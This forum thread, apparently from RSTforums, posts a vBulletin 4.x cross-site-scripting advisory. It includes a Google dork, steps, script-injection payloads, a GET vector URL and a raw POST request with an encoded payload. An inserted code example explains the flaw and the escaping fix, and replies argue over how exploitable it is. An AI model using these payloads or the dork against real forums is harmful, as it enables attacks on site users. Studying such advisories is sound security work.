[0-Day] vBulletin 4.2.x - Multiple Cross-Site-Scripting Vulnerabilities


Posted (edited)

After several messages I received, I decided to publish the vulnerabilities I found in vBulletin; some will be glad, others not. This being my first exploit, I hope you like it. I say we spread the exploit and do a bit of advertising for RST. :)

##########################################################################################
# -#-#- vBulletin 4.x.x - Multiple Cross-Site-Scripting Vulnerabilities -#-#-
# -#-#- RSTforums.com -#-#-
#
#
# • Exploit Title: vBulletin 4.x.x - Multiple Cross-Site-Scripting Vulnerabilities - Reflected
# • Google Dork: "Powered by vBulletin® Version 4.x.x"
# • Date: 13.08.2013
# • Exploit Author: Sensi
# • Website: RSTforums.com
# • Software Link: http://vbulletin.com/
# • Version: vBulletin 4.x.x
# • Tested on: Linux & Windows
# • Special thanks to: Kalash1337 (https://rstforums.com/forum/members/kalash1337/)
#
##########################################################################################
#
# ### First XSS ###
#
# Step 1: Go to -> Any post -> Press Editpost(advanced editor) -> Inspect 'title' element source and delete maxlength="85"
# (Direct Link:) http://localhost/[path]/editpost.php?p=[post number]&do=editpost
#
# Step 2: Add a malicious vector on title element.
# (Example:) sensisensisensisensisensisensisensisensisensisensisensisensisensisensisensisensisensi"><script>alert(/sensi @ RSTforums.com/);</script>
#
#________________________________________________________________________________________
#========================================================================================
#----------------------------------------------------------------------------------------
#
# ### Second XSS ###
#
# Step 1: Go to -> Any thread -> Press post new reply(advanced editor) -> Inspect 'title' element source and delete maxlength="85"
# (Direct Link:) http://localhost/[path]/newreply.php?p=[post number]&noquote=1
#
# Step 2: Add a malicious vector on title element.
# (Example:) sensisensisensisensisensisensisensisensisensisensisensisensisensisensisensisensisensi"><script>alert(/sensi @ RSTforums.com/);</script>
##########################################################################################
#
#
# Author will be not responsible for any damage caused! User assumes all responsibility.
#
#
##########################################################################################

Edited by sensi
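An added example, not part of sensi's post and not vBulletin's code, that models the pattern the advisory relies on: the title is reflected into an input element's value attribute without HTML-escaping, so a double quote closes the attribute and a greater-than sign closes the tag, while the form's maxlength="85" is only a browser hint that Inspect Element removes. The 85-character server-side limit, the rendering helper and the payload layout (85 characters of padding followed by the breakout) are assumptions taken from the advisory's own text; the tag scanner is a minimal check, not a real HTML parser.

```javascript
// Added example (not from the original post or from vBulletin): a toy model of the
// reflection the advisory describes. The 85-character server-side limit mirrors the
// form's maxlength attribute and is an assumption; vBulletin's own handler is not
// reproduced here.

const TITLE_MAX = 85; // assumed server-side limit, taken from maxlength="85"

// The payload pattern from the advisory: 85 characters of padding, then a quote to
// close the value attribute, a '>' to close the tag, and a script element.
const PAYLOAD = 'sensi'.repeat(17) +
  '"><script>alert(/sensi @ RSTforums.com/);</script>';

// Escape the characters that can break out of HTML text or a quoted attribute.
function htmlEscape(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Render the editor's title field. escape=false models the vulnerable page,
// escape=true the fix. The maxlength attribute is only a browser-side hint.
function renderTitleInput(title, escape) {
  const v = escape ? htmlEscape(title) : title;
  return `<input type="text" name="title" maxlength="85" value="${v}" />`;
}

// Minimal tag scanner: collects tag names that occur in markup position, that is
// outside quoted attribute values. Enough to tell attribute content from a new
// tag; it is not a full HTML parser.
function tagNames(html) {
  const names = [];
  let i = 0;
  while (i < html.length) {
    if (html[i] !== '<') { i += 1; continue; }
    const m = /^<\/?([a-zA-Z][\w-]*)/.exec(html.slice(i));
    if (!m) { i += 1; continue; }
    names.push(m[1].toLowerCase());
    i += m[0].length;
    let quote = null;
    while (i < html.length) {            // skip to the end of this tag
      const c = html[i];
      i += 1;
      if (quote) { if (c === quote) quote = null; }
      else if (c === '"' || c === "'") quote = c;
      else if (c === '>') break;
    }
  }
  return names;
}

// True when the rendered page contains a <script> element, i.e. the title broke
// out of the value attribute.
function scriptBreakout(title, escape) {
  return tagNames(renderTitleInput(title, escape)).includes('script');
}

// Server-side validation that the client-side maxlength cannot replace. Returns
// null when the title is acceptable, otherwise the reason for rejection.
function validateTitle(title) {
  if (title.length === 0) return 'empty title';
  if (title.length > TITLE_MAX) return `title exceeds ${TITLE_MAX} characters`;
  return null;
}

// Stand-alone run: prints the three outcomes.
console.log('unescaped ->', scriptBreakout(PAYLOAD, false)); // true
console.log('escaped   ->', scriptBreakout(PAYLOAD, true));  // false
console.log('validate  ->', validateTitle(PAYLOAD));
```

Escaping on output is the actual fix; the length check is a second line of defence that also shows why deleting maxlength in the browser cannot be the whole story: a server that enforced its own limit would have rejected a 113-character title before rendering it anywhere.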
Posted
That one is in New Topic, if you noticed; if it's old, the communities where I found it should have fixed it before I reported it ;)).

With a self-XSS there's nothing you can do :)

If it were exploitable, that would be something else.

I saw that they work on many sites.

Anyway, good job.

Posted
I don't understand why you got V.I.P. for something like this. You stole someone else's work.

You made an account specially to tell him that. From your own account you didn't have the courage?

I don't understand, what's bugging you? (envy, that much I know for sure)

Posted (edited)

I'm glad the guy got V.I.P. Nytro didn't want to take the self-XSS from the chat into consideration; he said it was "harmless". If that one is harmless, what is this one?

Edited by 1337
Posted (edited)

If I'm not mistaken, one of the XSSes found by akkiliON was the one in New Topic, so something similar to what I found.

@Reckon, stay in your lane, there's no point starting with you. :-j

@1337, that was Nytro's choice, I didn't force him; you know the saying, "Try again"... maybe you'll find something. :)

Edited by sensi
Posted (edited)

It was that one and the one in the trackback :)

I got VIP (I think) only for the exploitable one, in the trackback. :)

It was a POST method, but I turned it into a GET method.

Good luck.

// This is how it was via the GET method.

https://rstforums.com/forum/newthread.php?do=newthread&f=21&subject=1&message_backup=&sendtrackbacks=[vector]

Edited by akkiliON
Posted

Reckon, I said in the first post that I received some messages asking me to "reveal" the location, the vector, etc. If you take a look here you'll see that's what's being asked of me; some even pick on me. You don't know what you want either; now I understand why some people have withdrawn from this forum.

Posted

Reckon, if I were in your place I'd keep quiet; at least I don't mouth off at the admins and moderators and then the next day make a topic: "Please forgive me", "I'm lying in bed crying, only now do I realise how I behaved towards you, Tinky, I apologise", and then delete the topics. Why don't you leave them up? You have no guts. Boy, I think you're sick, and yes, he plays Metin; one day he was begging me to give him Metin accounts. Since we've come this far, why did Dany, Stone, Silent, Florin or whoever else "leave" you? Shall I say everything? No, there's no point, although part of what I wrote above can be confirmed. Sit down, you get a 3!

Posted

OFF: You're all so good at throwing crap in the guy's topic; go take a walk. If you don't like it, don't look, and stop commenting nonsense.

Instead of saying thanks that he posted it, you're quick to throw crap at the man.

ON: Well done sensi, I respect your decision to publish this. Good luck going forward.

Posted (edited)

This is the POST request

POST REQUEST

title=asdasndasdhashdjahdjasasdasndasdhashdjahdjashjasdjasdhjasdasndasdhashdjahdjasasdasndasdhashdjahdjashjasdjasdhjasdasndasdhashdjahdjasasdasndasdhashdjahdjashjasdjasdhjasdasndasdhashdjahdjasasdasndasdhashdjahdjashjasdjasdhj%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&
message_backup=gdfdfgghfghgfhgffg&message=gdfdfgghfghgfhgffg&wysiwyg=1
&iconid=0&
s=&securitytoken=1378319885-ec2663c8b3a45b95824d484e8e4aea7be94f68d4&do=postreply&t=1&p=&specifiedpost=0&posthash=2ebffc76043a2b2aaaba9e76de13b445&poststarttime=1378319752&loggedinuser=1&multiquoteempty=only&preview=Preview+Post&parseurl=1

All well and good, but how are you going to steal the attacked user's securitytoken (it's completely random, there's no way to guess it)? :)

// Without it the action could not be completed

// Conclusion: a nice find, and not that I don't respect the guy's work, but without a way to steal the token it's useless

Edited by danyweb09
Posted (edited)

Yes, it turned into this because of people like you; if even you confirm it, how the hell do you still have the nerve to comment? Ah yes, not everyone has character and respect for others; these are the people who hate the most, whoever knows me knows that.

@Matt, did you set the alarm for 7 so you can spam your news again? Even Diaconescu is envious of you.

That's it, I've said what needed saying, I've "vented". Try not to go off-topic anymore...

@danyweb09, if you look carefully it says EXAMPLE!

// I didn't read it properly, sorry.

Edited by sensi
Posted (edited)

@daatdraqq, yes, you're right; Nytro told me he wants to make a tutorial (through which you obtain something :-??, I'm not sure), but I don't know exactly what he was referring to. Maybe he'll give us more details.

I think session puzzling can be done too, @mah_one, am I wrong? I don't want to misinform.

Edited by sensi
Posted

Matt, he got you!
